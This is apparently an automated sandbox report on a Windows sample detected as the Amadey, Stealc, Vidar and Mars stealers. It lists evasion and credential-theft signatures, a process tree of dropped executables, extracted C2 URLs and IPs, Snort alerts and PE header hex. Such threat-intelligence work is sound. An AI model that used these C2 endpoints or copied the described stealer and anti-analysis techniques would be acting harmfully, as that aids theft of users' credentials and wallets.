Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1467093
MD5:	05dda1c444fe4feda4771f75598d55d7
SHA1:	3369deefd76ea12c621aad635547be857720d7d8
SHA256:	9a501e3c19a488ab6672598e26af59a019c471aaf67adcd1dba4734d7a2b9e48
Tags:	exe
Infos:

Detection

Amadey, Mars Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Amadeys stealer DLL

Yara detected Mars stealer

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has nameless sections

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 4368 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 05DDA1C444FE4FEDA4771F75598D55D7)

cmd.exe (PID: 5792 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

BAFIEGIECG.exe (PID: 5564 cmdline: "C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe" MD5: 4E12569D3C3E421F624FD7560AC127A2)

explorti.exe (PID: 1780 cmdline: "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" MD5: 4E12569D3C3E421F624FD7560AC127A2)

cmd.exe (PID: 6416 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GDHIIIIEHC.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorti.exe (PID: 6048 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: 4E12569D3C3E421F624FD7560AC127A2)

explorti.exe (PID: 4616 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: 4E12569D3C3E421F624FD7560AC127A2)

7873c16243.exe (PID: 6984 cmdline: "C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe" MD5: 05DDA1C444FE4FEDA4771F75598D55D7)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://85.28.47.4/920475a59bac849d.php"}

Threatname: Vidar

{"C2 url": "http://85.28.47.4/920475a59bac849d.php"}

Threatname: Amadey

{"C2 url": ["http://77.91.77.82/Hun4Ko/index.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000C.00000003.2668322526.0000000005160000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000E.00000003.2760972491.0000000004910000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000A.00000002.2677594002.00000000003F1000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000D.00000003.2678309307.0000000004890000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000D.00000002.2718941030.00000000009B1000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000E.00000002.3412646742.00000000009B1000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000F.00000002.2838460669.0000000000DB1000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000F.00000002.2838460669.0000000000DB1000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000000.00000002.2623849094.0000000001605000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2622413487.0000000000361000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.2622413487.0000000000361000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000C.00000002.2708594114.00000000009B1000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000A.00000003.2636976626.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: file.exe PID: 4368	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 4368	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 4368	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 7873c16243.exe PID: 6984	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author
12.2.explorti.exe.9b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
13.2.explorti.exe.9b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
14.2.explorti.exe.9b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
10.2.BAFIEGIECG.exe.3f0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.file.exe.360000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.360000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
15.2.7873c16243.exe.db0000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
15.2.7873c16243.exe.db0000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
Click to see the 3 entries

Snort Signatures

ET TROJAN Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.6 - Destination IP: 85.28.47.4

Timestamp:	07/03/24-18:08:01.724903
SID:	2044246
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 - Source IP: 85.28.47.4 - Destination IP: 192.168.2.6

Timestamp:	07/03/24-18:08:01.906328
SID:	2051831
Source Port:	80
Destination Port:	49710
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 - Source IP: 85.28.47.4 - Destination IP: 192.168.2.6

Timestamp:	07/03/24-18:08:01.688434
SID:	2051828
Source Port:	80
Destination Port:	49710
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.6 - Destination IP: 85.28.47.4

Timestamp:	07/03/24-18:08:00.820248
SID:	2044243
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.6 - Destination IP: 85.28.47.4

Timestamp:	07/03/24-18:08:01.507830
SID:	2044244
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Code function: 0_2_6C9C6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,

0_2_6C9C6C80

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2653190824.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2653190824.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.6:49710 -> 85.28.47.4:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.6:49710 -> 85.28.47.4:80
Source: Traffic	Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.4:80 -> 192.168.2.6:49710
Source: Traffic	Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.6:49710 -> 85.28.47.4:80
Source: Traffic	Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.4:80 -> 192.168.2.6:49710

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor	URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor	IPs: 77.91.77.82

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 03 Jul 2024 16:08:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 03 Jul 2024 16:08:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 03 Jul 2024 16:08:37 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
